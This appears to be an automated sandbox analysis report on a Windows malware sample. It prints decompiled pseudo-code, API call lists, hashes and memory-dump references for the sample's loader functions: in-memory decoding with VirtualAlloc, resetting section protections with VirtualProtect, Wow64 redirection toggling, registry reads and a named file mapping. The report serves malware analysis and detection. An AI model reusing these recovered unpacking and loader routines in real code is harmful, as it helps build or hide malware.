String ID: Ut
API String ID: 2794511967-8415677
Opcode ID: 237a511b3ba7f9793a0a110a24c5d8f48e5e897a2b6fa06758ecb35ad454deaa
Instruction ID: 7855824c2f9172942409b78d2bf3de0fe2b87b9235dcb310a7d2fffaa922d6c4
Opcode Fuzzy Hash: 237a511b3ba7f9793a0a110a24c5d8f48e5e897a2b6fa06758ecb35ad454deaa
Instruction Fuzzy Hash: F1312C76600109EFEB01EFA4E944A9A7BB9FB08304F108026F916E7240D774EE56CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F68E6E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E04F68E6E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x4f6d2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E04F63EED(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E04F620EA(_t19);
					if(_t20 == 0) {
						HeapFree( *0x4f6d1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x4f6d2e8; // 0x5e79bb8
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x04f68e75
0x04f68e7c
0x04f68e7f
0x04f68e86
0x04f68e8b
0x04f68e8d
0x04f68e94
0x04f68e9b
0x00000000
0x00000000
0x04f68e9d
0x04f68ea2
0x04f68ea3
0x04f68eaa
0x04f68ec4
0x00000000
0x04f68eac
0x04f68eac
0x04f68eae
0x04f68eb1
0x04f68eb5
0x00000000
0x00000000
0x04f68eb7
0x04f68eb5
0x04f68ece
0x04f68ed0
0x04f68ed6
0x04f68ed8
0x04f68ede
0x04f68ee5
0x04f68ef5
0x04f68eed
0x04f68ef0
0x04f68ef0
0x04f68ef8
0x04f68ef8
0x04f68f02
0x04f68f02
0x04f68eca
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04F68E8B

Part of subcall function 04F63EED: RtlAllocateHeap.NTDLL(00000000,59935A40,04F6D2E0), ref: 04F63F18
Part of subcall function 04F63EED: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04F63F3A
Part of subcall function 04F63EED: memset.NTDLL ref: 04F63F54
Part of subcall function 04F63EED: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F63F92
Part of subcall function 04F63EED: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F63FA6
Part of subcall function 04F63EED: FindCloseChangeNotification.KERNELBASE(00000001), ref: 04F63FBD
Part of subcall function 04F63EED: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F63FC9
Part of subcall function 04F63EED: lstrcat.KERNEL32(?,642E2A5C), ref: 04F6400A
Part of subcall function 04F63EED: FindFirstFileA.KERNELBASE(?,?), ref: 04F64020

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04F68ED0

Part of subcall function 04F620EA: lstrlen.KERNEL32(?,04F6D2E0,74E47FC0,00000000,04F68EA8,00000001,00000001,?,?,?,04F68A5F,00000001), ref: 04F620F3
Part of subcall function 04F620EA: mbstowcs.NTDLL ref: 04F6211A
Part of subcall function 04F620EA: memset.NTDLL ref: 04F6212C

HeapFree.KERNEL32(00000000,00000001,00000001,00000001,?,?,?,04F68A5F,00000001), ref: 04F68EC4

Strings

Ut, xrefs: 04F68EC4

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID: Ut
API String ID: 1489712272-8415677
Opcode ID: 25b370105818fddebfca344fe87d874cc78a831d100b7d39983da6aa2b777e22
Instruction ID: a0d5b38834527cc12eb66b7915ee131f55ede59cffd7d8828a93865ad63031c6
Opcode Fuzzy Hash: 25b370105818fddebfca344fe87d874cc78a831d100b7d39983da6aa2b777e22
Instruction Fuzzy Hash: 49110476A01208FEEB00ABD5DC44BADB7B8EB65398F10006AE542D7190D3B5BD82DB64

Uniqueness

Uniqueness Score: -1.00%

Function 04F63DEB, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 04F63E42
SysAllocString.OLEAUT32(04F698E6), ref: 04F63E85
SysFreeString.OLEAUT32(00000000), ref: 04F63E99
SysFreeString.OLEAUT32(00000000), ref: 04F63EA7

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0b4b534b354a16b890d475a41bb0063512237eebc72418a715a6a0c30a66bb94
Instruction ID: d0d9ff3eaf460d0390f0605eb7c977f7b1376f68819df1b4a8e5c8c0fc3d2c63
Opcode Fuzzy Hash: 0b4b534b354a16b890d475a41bb0063512237eebc72418a715a6a0c30a66bb94
Instruction Fuzzy Hash: 56311E76900109EFCB05DF98D9C48AE7BB5FF58340B10842EF91A97250E735A94ACF71

Uniqueness

Uniqueness Score: -1.00%

Function 004012E1, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004012E1(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x4030f0;
				_t42 = E00401600(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x403100;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x404132;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E00401C3B(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x403100 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x004012e8
0x004012f8
0x004012ff
0x00401302
0x00401317
0x0040131e
0x00401323
0x00401334
0x00401337
0x0040133f
0x00401342
0x004013ec
0x00401348
0x00401348
0x0040134e
0x004013b4
0x00401350
0x00401353
0x0040135d
0x00401360
0x00401363
0x0040136b
0x00401376
0x00401377
0x00401378
0x00401387
0x00401390
0x0040139a
0x0040139d
0x004013a0
0x004013aa
0x004013af
0x00000000
0x00000000
0x00401368
0x00401368
0x004013b1
0x004013be
0x004013d3
0x004013c0
0x004013c9
0x004013ce
0x004013e4
0x004013e4
0x004013f3
0x004013f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E), ref: 00401337
memcpy.NTDLL(?,?,?,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E,-00000008), ref: 004013C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E), ref: 004013E4

Strings

Sep 23 2020, xrefs: 0040136E

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 23 2020
API String ID: 4010158826-2113092453
Opcode ID: d03826b4d32de0089940a906771961d2689a913be64223262ff4230deba363b0
Instruction ID: c043474091c58a5a994c2e4547e4c22f90d0303aeb581a14e4da22974a638c86
Opcode Fuzzy Hash: d03826b4d32de0089940a906771961d2689a913be64223262ff4230deba363b0
Instruction Fuzzy Hash: A0313271D00219EBDB00CF95D981BDEBBB9FF08304F108166E905B7291D775AA05DB98

Uniqueness

Uniqueness Score: -1.00%

Function 04F65D27, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04F65D27(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04F62CDB(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x04f65d33
0x04f65d37
0x04f65d38
0x04f65d39
0x04f65d3b
0x04f65d3d
0x04f65d42
0x04f65d45
0x04f65ddc
0x04f65de3
0x04f65de3
0x04f65d4e
0x04f65d55
0x04f65d65
0x04f65d65
0x04f65d6b
0x04f65d6d
0x04f65d72
0x04f65d7b
0x04f65d83
0x04f65d86
0x04f65d91
0x04f65d95
0x04f65d97
0x04f65d98
0x04f65da1
0x04f65da5
0x04f65db6
0x04f65da7
0x04f65dac
0x04f65db1
0x04f65dc0
0x04f65dc0
0x04f65d95
0x04f65dc6
0x04f65dcc
0x04f65dcc
0x04f65dd5
0x04f65dda
0x04f65dda
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 04F65D55
lstrlenW.KERNEL32(?), ref: 04F65D8B
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04F65DAC
SysFreeString.OLEAUT32(?), ref: 04F65DC0

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: fe9259761acd0113fb9493a5cd3fd686fcd08b8c64d568e2dae75ed527093ce6
Instruction ID: f3fd5d3e118dd234a47f22799adb3662df2951c12112c74c79042e96df9b212c
Opcode Fuzzy Hash: fe9259761acd0113fb9493a5cd3fd686fcd08b8c64d568e2dae75ed527093ce6
Instruction Fuzzy Hash: EB214475E01209FFCB11DFA4D8889DEBBB9FF49344B104169E946E7250E730EA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040121D, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040121D() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x403110 =  *0x403110 & 0x00000000;
				_push(0);
				_push(0x40310c);
				_push(1);
				_push( *0x403104 + 0x404084);
				 *0x403108 = 0xc; // executed
				L004015FA(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E00401689( &_v44,  &_v28,  *0x403100 ^ 0xc786104c) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x4030f8);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E00401497(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x4030f8;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E00401E3E(_v44, _t37); // executed
				goto L7;
			}

0x00401228
0x00401233
0x00401235
0x0040123a
0x00401242
0x00401243
0x0040124d
0x00401256
0x0040125b
0x00401279
0x004012d8
0x004012d9
0x004012da
0x004012da
0x00401281
0x00401287
0x00401287
0x00401295
0x00401299
0x004012a0
0x004012a2
0x004012aa
0x004012ae
0x004012b4
0x004012c6
0x004012b6
0x004012bc
0x004012c1
0x004012b4
0x004012cf
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0040310C,00000000), ref: 0040124D
lstrlenW.KERNEL32(?,?,?), ref: 00401281

Part of subcall function 00401497: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A,?), ref: 004014A4
Part of subcall function 00401497: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004014BA
Part of subcall function 00401497: _snwprintf.NTDLL ref: 004014DF
Part of subcall function 00401497: CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401504
Part of subcall function 00401497: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A), ref: 0040151B
Part of subcall function 00401497: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E), ref: 00401550

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 004012BC
ExitThread.KERNEL32 ref: 004012DA

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: dcac0b8b37b64ff266155d2fba7988be3c9750359eeab1005482c8877062af48
Instruction ID: c16ea711abc00dfa941d8e1dc6d24cdea2b5cbb7c395ce17ab9e2567ed341ad8
Opcode Fuzzy Hash: dcac0b8b37b64ff266155d2fba7988be3c9750359eeab1005482c8877062af48
Instruction Fuzzy Hash: 90117F72504341ABD710DF51DD8AF977BECAB48344F00493AB605FB1E1E778E6488B59

Uniqueness

Uniqueness Score: -1.00%

Function 004017B2, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004017B2(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x004017b2
0x004017bc
0x004017c1
0x004017cd
0x004017da
0x004017e0
0x004017e2
0x004017e8
0x00401854
0x0040185b
0x0040185b
0x004017ea
0x004017ed
0x004017ed
0x004017f1
0x00000000
0x00000000
0x004017f3
0x004017f7
0x0040180c
0x00401810
0x00401826
0x00401812
0x00401812
0x0040181b
0x00401821
0x00401821
0x004017f9
0x004017f9
0x00401802
0x00401807
0x00401807
0x00401837
0x0040183b
0x00401843
0x00401843
0x00401846
0x00401849
0x00401852
0x00000000
0x00000000
0x00000000
0x00000000
0x00401852
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,00000000,00000002,?,?,00000002), ref: 004017E0
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401837
GetLastError.KERNEL32(?,?), ref: 0040183D

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 4a0750dcc60e9a16a3311590b1f1a4628549ea63e6ffe916e98ba27a949fcc04
Instruction ID: 4aecdf1aca2e545932916963ca8b44c7d858f58479462b1308d3598b5259a006
Opcode Fuzzy Hash: 4a0750dcc60e9a16a3311590b1f1a4628549ea63e6ffe916e98ba27a949fcc04
Instruction Fuzzy Hash: 0221D577900109EFDB209F85CC80EADF7F5FB54315F20816AE64167151E3789A8ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 04F642FE, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F642FE(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x4f6d230; // 0xf0a5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x4f6ea70; // 0x4f0053
				_v16 = 4;
				_t31 = E04F61364(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x4f6d230; // 0xf0a5a8
					_t5 = _t19 + 0x4f6eacc; // 0x6e0049
					_t34 = E04F61364(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E04F61D77(_t34);
					}
					E04F61D77(_t31);
				}
				return _v8;
			}

0x04f64304
0x04f64309
0x04f6430e
0x04f64315
0x04f64321
0x04f64325
0x04f64327
0x04f6432d
0x04f64339
0x04f6433d
0x04f64350
0x04f64358
0x04f6436c
0x04f64374
0x04f64376
0x04f64376
0x04f6437d
0x04f6437d
0x04f64384
0x04f64384
0x04f6438a
0x04f6438f
0x04f64395

APIs

Part of subcall function 04F61364: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04F64321,004F0053,00000000,?), ref: 04F6136D
Part of subcall function 04F61364: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04F64321,004F0053,00000000,?), ref: 04F61397
Part of subcall function 04F61364: memset.NTDLL ref: 04F613AB

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000001,006E0049,?,004F0053,00000000,?), ref: 04F64350
RegQueryValueExW.KERNELBASE(00000001,00000000,00000000,00000004,00000000,00000004), ref: 04F6436C
RegCloseKey.ADVAPI32(00000001), ref: 04F6437D

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: adb554d1201b63335de1db0909f31b753c330aeabe9d03c8a495c8963285969b
Instruction ID: f7fc2598dc9325c4b9ecc0951a156da3753e4ab61272274e5e7b4cab73aba651
Opcode Fuzzy Hash: adb554d1201b63335de1db0909f31b753c330aeabe9d03c8a495c8963285969b
Instruction Fuzzy Hash: 5A115E76A00208FBEB11EB98ED85FAEB7FCEB04704F144455E212E6040E774EA069B24

Uniqueness

Uniqueness Score: -1.00%

Function 04F62AF0, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04F62AF0(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04F63DEB(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4f6d230; // 0xf0a5a8
						_t20 = _t68 + 0x4f6e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04F62160(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x04f62af6
0x04f62af9
0x04f62b09
0x04f62b12
0x04f62b16
0x04f62be4
0x04f62bea
0x04f62bea
0x04f62b30
0x04f62b35
0x04f62b39
0x04f62b3f
0x04f62b44
0x04f62b4b
0x04f62b5a
0x04f62b5a
0x04f62b5e
0x04f62b60
0x04f62b6c
0x04f62b77
0x04f62b82
0x04f62b86
0x04f62b90
0x04f62b94
0x04f62b96
0x04f62b9b
0x04f62ba2
0x04f62bb2
0x04f62bb2
0x04f62b9b
0x04f62b94
0x04f62bb4
0x04f62bb9
0x04f62bbe
0x04f62bbe
0x04f62bc4
0x04f62bca
0x04f62bcf
0x04f62bcf
0x04f62bd4
0x04f62bd9
0x04f62bd9
0x04f62bd4
0x04f62b5e
0x04f62bdb
0x04f62be1
0x00000000

APIs

Part of subcall function 04F63DEB: SysAllocString.OLEAUT32(80000002), ref: 04F63E42
Part of subcall function 04F63DEB: SysFreeString.OLEAUT32(00000000), ref: 04F63EA7

SysFreeString.OLEAUT32(?), ref: 04F62BCF
SysFreeString.OLEAUT32(04F698E6), ref: 04F62BD9

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0579b1bb6f6c590adf3655651e08fd3d3786061c5cabdb80aaec2157017aba12
Instruction ID: 237000eef619a0bca1cf59c841af58c5ba53ee701bb3492b16fec46e626aae33
Opcode Fuzzy Hash: 0579b1bb6f6c590adf3655651e08fd3d3786061c5cabdb80aaec2157017aba12
Instruction Fuzzy Hash: 4A312A72900159AFCB15EF59CC88C9BBB79FFC97407164A98F8169B210D731ED92CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F68696, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F68696(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E04F617DE(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E04F61D8C(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x4f6d1f0, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x04f6869e
0x04f686f3
0x04f686f8
0x04f686a0
0x04f686ba
0x04f686be
0x04f686c3
0x04f686c5
0x04f686d5
0x04f686e1
0x04f686c7
0x04f686c7
0x04f686ca
0x04f686cf
0x04f686cf
0x04f686c5
0x04f686be
0x04f686fe

APIs

Part of subcall function 04F61D8C: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,04F6991D,3D04F6C0,80000002,04F629E4,00000000,04F629E4,?,65696C43,80000002), ref: 04F61DCE
